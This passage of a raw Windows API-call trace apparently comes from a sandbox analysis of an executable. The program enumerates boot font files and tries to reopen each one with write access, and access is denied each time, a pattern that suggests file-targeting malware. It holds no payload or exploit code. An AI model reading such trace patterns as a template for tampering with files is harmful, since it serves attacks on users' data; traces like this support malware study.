hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.343] AreFileApisANSI () returned 1 [0083.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\msjh_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\msjh_boot.ttf", lpUsedDefaultChar=0x0) returned 28 [0083.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.343] AreFileApisANSI () returned 1 [0083.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0083.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78410 [0083.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78410, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 28 [0083.343] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.343] GetFileType (hFile=0x340) returned 0x1 [0083.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78410 | out: hHeap=0x20000) returned 1 [0083.344] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.344] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.344] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.344] CloseHandle (hObject=0x340) returned 1 [0083.344] AreFileApisANSI () returned 1 [0083.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0083.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x77fd0 [0083.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x77fd0, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 28 [0083.344] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.344] GetLastError () returned 0x5 [0083.345] GetLastError () returned 0x5 [0083.345] SetLastError (dwErrCode=0x5) [0083.345] GetLastError () returned 0x5 [0083.345] SetLastError (dwErrCode=0x5) [0083.345] GetLastError () returned 0x5 [0083.345] SetLastError (dwErrCode=0x5) [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x77fd0 | out: hHeap=0x20000) returned 1 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.345] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.346] AreFileApisANSI () returned 1 [0083.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\msyhn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\msyhn_boot.ttf", lpUsedDefaultChar=0x0) returned 29 [0083.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.346] AreFileApisANSI () returned 1 [0083.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0083.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53718 [0083.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=29 | out: lpWideCharStr="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 29 [0083.346] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.346] GetFileType (hFile=0x340) returned 0x1 [0083.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.347] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.347] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.347] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.347] CloseHandle (hObject=0x340) returned 1 [0083.347] AreFileApisANSI () returned 1 [0083.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0083.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x533b8 [0083.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=29 | out: lpWideCharStr="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 29 [0083.347] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.347] GetLastError () returned 0x5 [0083.347] GetLastError () returned 0x5 [0083.347] SetLastError (dwErrCode=0x5) [0083.348] GetLastError () returned 0x5 [0083.348] SetLastError (dwErrCode=0x5) [0083.348] GetLastError () returned 0x5 [0083.348] SetLastError (dwErrCode=0x5) [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.348] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.349] AreFileApisANSI () returned 1 [0083.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\msyh_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\msyh_boot.ttf", lpUsedDefaultChar=0x0) returned 28 [0083.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.349] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.349] AreFileApisANSI () returned 1 [0083.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0083.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x77fd0 [0083.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x77fd0, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 28 [0083.349] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.349] GetFileType (hFile=0x340) returned 0x1 [0083.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x77fd0 | out: hHeap=0x20000) returned 1 [0083.350] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.350] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.350] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.350] CloseHandle (hObject=0x340) returned 1 [0083.350] AreFileApisANSI () returned 1 [0083.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0083.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x786d0 [0083.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x786d0, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 28 [0083.350] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.350] GetLastError () returned 0x5 [0083.350] GetLastError () returned 0x5 [0083.350] SetLastError (dwErrCode=0x5) [0083.350] GetLastError () returned 0x5 [0083.351] SetLastError (dwErrCode=0x5) [0083.351] GetLastError () returned 0x5 [0083.351] SetLastError (dwErrCode=0x5) [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x786d0 | out: hHeap=0x20000) returned 1 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.351] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.351] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.351] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0083.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0083.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0083.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0083.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0083.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0083.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0083.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.361] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0083.361] AreFileApisANSI () returned 1 [0083.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\segmono_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\segmono_boot.ttf", lpUsedDefaultChar=0x0) returned 31 [0083.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 